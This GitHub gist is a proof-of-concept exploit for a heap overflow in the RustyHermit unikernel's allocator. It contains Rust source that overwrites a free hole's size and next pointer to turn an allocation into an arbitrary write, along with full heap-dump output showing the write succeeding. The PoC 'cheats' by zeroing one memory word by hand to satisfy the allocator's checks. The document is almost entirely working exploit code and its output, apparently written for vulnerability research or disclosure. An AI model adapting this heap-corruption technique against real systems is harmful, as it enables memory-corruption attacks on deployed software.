Last active
March 9, 2022 12:59
-
-
Save lrapp-x41-pub/80e3b4645a72167504db330b014123f6 to your computer and use it in GitHub Desktop.
RustyHermit Heap Overflow to Arbitrary Write Proof of Concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--- Welcome aboard our Airbus A 1337! --- | |
[info] Main @ 0x1906700 | |
heap layout after allocating all buffers | |
0x1c04200: 0x101010101010101 | |
0x1c04208: 0x101010101010101 | |
0x1c04210: 0x101010101010101 | |
0x1c04218: 0x101010101010101 | |
0x1c04220: 0x0 | |
0x1c04228: 0x0 | |
0x1c04230: 0x0 | |
0x1c04238: 0x0 | |
0x1c04240: 0x0 | |
0x1c04248: 0x0 | |
0x1c04250: 0x0 | |
0x1c04258: 0x0 | |
0x1c04260: 0x0 | |
0x1c04268: 0x0 | |
0x1c04270: 0x0 | |
0x1c04278: 0x0 | |
0x1c04280: 0x202020202020202 | |
0x1c04288: 0x202020202020202 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x303030303030303 | |
0x1c04388: 0x303030303030303 | |
0x1c04390: 0x303030303030303 | |
0x1c04398: 0x303030303030303 | |
0x1c043a0: 0x303030303030303 | |
0x1c043a8: 0x303030303030303 | |
0x1c043b0: 0x303030303030303 | |
0x1c043b8: 0x303030303030303 | |
0x1c043c0: 0x303030303030303 | |
0x1c043c8: 0x303030303030303 | |
0x1c043d0: 0x303030303030303 | |
0x1c043d8: 0x303030303030303 | |
0x1c043e0: 0x303030303030303 | |
0x1c043e8: 0x303030303030303 | |
0x1c043f0: 0x303030303030303 | |
0x1c043f8: 0x303030303030303 | |
0x1c04400: 0x1bfbc00 | |
0x1c04408: 0x0 | |
0x1c04410: 0x0 | |
0x1c04418: 0x0 | |
0x1c04420: 0x0 | |
0x1c04428: 0x0 | |
0x1c04430: 0x0 | |
0x1c04438: 0x0 | |
0x1c04440: 0x0 | |
0x1c04448: 0x0 | |
0x1c04450: 0x0 | |
0x1c04458: 0x0 | |
0x1c04460: 0x0 | |
0x1c04468: 0x0 | |
0x1c04470: 0x0 | |
0x1c04478: 0x0 | |
heap layout after deallocating buffer2 | |
0x1c04200: 0x101010101010101 | |
0x1c04208: 0x101010101010101 | |
0x1c04210: 0x101010101010101 | |
0x1c04218: 0x101010101010101 | |
0x1c04220: 0x0 | |
0x1c04228: 0x0 | |
0x1c04230: 0x0 | |
0x1c04238: 0x0 | |
0x1c04240: 0x0 | |
0x1c04248: 0x0 | |
0x1c04250: 0x0 | |
0x1c04258: 0x0 | |
0x1c04260: 0x0 | |
0x1c04268: 0x0 | |
0x1c04270: 0x0 | |
0x1c04278: 0x0 | |
0x1c04280: 0x80 | |
0x1c04288: 0x1c04400 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x303030303030303 | |
0x1c04388: 0x303030303030303 | |
0x1c04390: 0x303030303030303 | |
0x1c04398: 0x303030303030303 | |
0x1c043a0: 0x303030303030303 | |
0x1c043a8: 0x303030303030303 | |
0x1c043b0: 0x303030303030303 | |
0x1c043b8: 0x303030303030303 | |
0x1c043c0: 0x303030303030303 | |
0x1c043c8: 0x303030303030303 | |
0x1c043d0: 0x303030303030303 | |
0x1c043d8: 0x303030303030303 | |
0x1c043e0: 0x303030303030303 | |
0x1c043e8: 0x303030303030303 | |
0x1c043f0: 0x303030303030303 | |
0x1c043f8: 0x303030303030303 | |
0x1c04400: 0x1bfbc00 | |
0x1c04408: 0x0 | |
0x1c04410: 0x0 | |
0x1c04418: 0x0 | |
0x1c04420: 0x0 | |
0x1c04428: 0x0 | |
0x1c04430: 0x0 | |
0x1c04438: 0x0 | |
0x1c04440: 0x0 | |
0x1c04448: 0x0 | |
0x1c04450: 0x0 | |
0x1c04458: 0x0 | |
0x1c04460: 0x0 | |
0x1c04468: 0x0 | |
0x1c04470: 0x0 | |
0x1c04478: 0x0 | |
heap layout after cheating | |
0x1c04200: 0x4141414141414141 | |
0x1c04208: 0x4141414141414141 | |
0x1c04210: 0x4141414141414141 | |
0x1c04218: 0x4141414141414141 | |
0x1c04220: 0x4141414141414141 | |
0x1c04228: 0x4141414141414141 | |
0x1c04230: 0x4141414141414141 | |
0x1c04238: 0x4141414141414141 | |
0x1c04240: 0x4141414141414141 | |
0x1c04248: 0x4141414141414141 | |
0x1c04250: 0x4141414141414141 | |
0x1c04258: 0x4141414141414141 | |
0x1c04260: 0x4141414141414141 | |
0x1c04268: 0x4141414141414141 | |
0x1c04270: 0x4141414141414141 | |
0x1c04278: 0x4141414141414141 | |
0x1c04280: 0x40 | |
0x1c04288: 0x1c04380 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x303030303030303 | |
0x1c04388: 0x0 | |
0x1c04390: 0x303030303030303 | |
0x1c04398: 0x303030303030303 | |
0x1c043a0: 0x303030303030303 | |
0x1c043a8: 0x303030303030303 | |
0x1c043b0: 0x303030303030303 | |
0x1c043b8: 0x303030303030303 | |
0x1c043c0: 0x303030303030303 | |
0x1c043c8: 0x303030303030303 | |
0x1c043d0: 0x303030303030303 | |
0x1c043d8: 0x303030303030303 | |
0x1c043e0: 0x303030303030303 | |
0x1c043e8: 0x303030303030303 | |
0x1c043f0: 0x303030303030303 | |
0x1c043f8: 0x303030303030303 | |
0x1c04400: 0x1bfbc00 | |
0x1c04408: 0x0 | |
0x1c04410: 0x0 | |
0x1c04418: 0x0 | |
0x1c04420: 0x0 | |
0x1c04428: 0x0 | |
0x1c04430: 0x0 | |
0x1c04438: 0x0 | |
0x1c04440: 0x0 | |
0x1c04448: 0x0 | |
0x1c04450: 0x0 | |
0x1c04458: 0x0 | |
0x1c04460: 0x0 | |
0x1c04468: 0x0 | |
0x1c04470: 0x0 | |
0x1c04478: 0x0 | |
heap layout after exploit | |
0x1c04200: 0x4141414141414141 | |
0x1c04208: 0x4141414141414141 | |
0x1c04210: 0x4141414141414141 | |
0x1c04218: 0x4141414141414141 | |
0x1c04220: 0x4141414141414141 | |
0x1c04228: 0x4141414141414141 | |
0x1c04230: 0x4141414141414141 | |
0x1c04238: 0x4141414141414141 | |
0x1c04240: 0x4141414141414141 | |
0x1c04248: 0x4141414141414141 | |
0x1c04250: 0x4141414141414141 | |
0x1c04258: 0x4141414141414141 | |
0x1c04260: 0x4141414141414141 | |
0x1c04268: 0x4141414141414141 | |
0x1c04270: 0x4141414141414141 | |
0x1c04278: 0x4141414141414141 | |
0x1c04280: 0x40 | |
0x1c04288: 0x1c04500 | |
0x1c04290: 0x202020202020202 | |
0x1c04298: 0x202020202020202 | |
0x1c042a0: 0x202020202020202 | |
0x1c042a8: 0x202020202020202 | |
0x1c042b0: 0x202020202020202 | |
0x1c042b8: 0x202020202020202 | |
0x1c042c0: 0x0 | |
0x1c042c8: 0x0 | |
0x1c042d0: 0x0 | |
0x1c042d8: 0x0 | |
0x1c042e0: 0x0 | |
0x1c042e8: 0x0 | |
0x1c042f0: 0x0 | |
0x1c042f8: 0x0 | |
0x1c04300: 0x303030303030303 | |
0x1c04308: 0x303030303030303 | |
0x1c04310: 0x303030303030303 | |
0x1c04318: 0x303030303030303 | |
0x1c04320: 0x303030303030303 | |
0x1c04328: 0x303030303030303 | |
0x1c04330: 0x303030303030303 | |
0x1c04338: 0x303030303030303 | |
0x1c04340: 0x303030303030303 | |
0x1c04348: 0x303030303030303 | |
0x1c04350: 0x303030303030303 | |
0x1c04358: 0x303030303030303 | |
0x1c04360: 0x303030303030303 | |
0x1c04368: 0x303030303030303 | |
0x1c04370: 0x303030303030303 | |
0x1c04378: 0x303030303030303 | |
0x1c04380: 0x404040404040404 | |
0x1c04388: 0x404040404040404 | |
0x1c04390: 0x404040404040404 | |
0x1c04398: 0x404040404040404 | |
0x1c043a0: 0x404040404040404 | |
0x1c043a8: 0x404040404040404 | |
0x1c043b0: 0x404040404040404 | |
0x1c043b8: 0x404040404040404 | |
0x1c043c0: 0x404040404040404 | |
0x1c043c8: 0x404040404040404 | |
0x1c043d0: 0x404040404040404 | |
0x1c043d8: 0x404040404040404 | |
0x1c043e0: 0x404040404040404 | |
0x1c043e8: 0x404040404040404 | |
0x1c043f0: 0x404040404040404 | |
0x1c043f8: 0x404040404040404 | |
0x1c04400: 0x404040404040404 | |
0x1c04408: 0x404040404040404 | |
0x1c04410: 0x404040404040404 | |
0x1c04418: 0x404040404040404 | |
0x1c04420: 0x404040404040404 | |
0x1c04428: 0x404040404040404 | |
0x1c04430: 0x404040404040404 | |
0x1c04438: 0x404040404040404 | |
0x1c04440: 0x404040404040404 | |
0x1c04448: 0x404040404040404 | |
0x1c04450: 0x404040404040404 | |
0x1c04458: 0x404040404040404 | |
0x1c04460: 0x404040404040404 | |
0x1c04468: 0x404040404040404 | |
0x1c04470: 0x404040404040404 | |
0x1c04478: 0x404040404040404 | |
[info] written to 0x1c04380! | |
--- Thank you for flying with Expl01t Airlines! --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#[cfg(target_os = "hermit")] | |
extern crate hermit_sys; | |
fn print_heap_layout(base: usize) { | |
let mut i = 0; | |
while i < 0x280 { | |
unsafe { | |
println!("{:p}: 0x{:x}", (base+i) as *const usize, *((base+i) as *const usize)); | |
} | |
i += 8; | |
} | |
} | |
fn main() { | |
println!("\n--- Welcome aboard our Airbus A 1337! ---\n"); | |
println!("[info] Main @ {:p}", main as *const ()); | |
// simulated intput | |
// fill legitimate buffer + padding to 128byte | |
let input: Vec<u8> = Vec::from([ | |
// fill legitimate 128 byte buffer | |
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, | |
// overwrite following hole's size | |
0x40, 0, 0, 0, 0, 0, 0, 0, | |
// overwrite following holes's next pointer with our arbitrary target address | |
0x80, 0x43, 0xc0, 0x01, 0, 0, 0, 0 | |
]); | |
// allocate buffers | |
let mut buf: Vec<u8> = vec![1; 32]; | |
let buf2: Vec<u8> = vec![2; 64]; | |
let _buf3: Vec<u8> = vec![3; 256]; | |
println!("\n heap layout after allocating all buffers"); | |
print_heap_layout(buf.as_ptr() as usize); | |
// free buffer2 to have buffer followed by a hole | |
drop(buf2); | |
println!("\n heap layout after deallocating buffer2"); | |
print_heap_layout(buf.as_ptr() as usize); | |
unsafe { | |
// vulnerable copy loop e.g. for a driver copying from shared mmio | |
let mut i = 0; | |
for elem in input { | |
*(buf.as_mut_ptr().offset(i)) = elem; | |
i+=1; | |
} | |
// allocator runs into page fault when fake_hole.next_ptr is not readable or not 0 (end of | |
// hole list) | |
// also the constraint hole_addr + hole.size <= addr has to be met for the next hole | |
// see src/mm/hole.rs#L244 | |
// Thus, the constraint for this exploit to work is: | |
// 1. Target address needs to have a value large enough we get the hole allocated AND | |
// 2. Traget address + 8 has to be 0 or a valid readable address matching above condition | |
// cheat: set target address + 8 to 0 for this poc | |
*(0x1c04388 as *mut u64) = 0; | |
} | |
println!("\n heap layout after cheating"); | |
print_heap_layout(buf.as_ptr() as usize); | |
// allocate buffer which now is allocated at out arbitrary target address | |
// write payload there | |
let buf4: Vec<u8> = vec![4; 257]; | |
println!("\n heap layout after exploit"); | |
print_heap_layout(buf.as_ptr() as usize); | |
println!("[info] written to {:p}!", buf4.as_ptr()); | |
println!("\n--- Thank you for flying with Expl01t Airlines! ---\n"); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment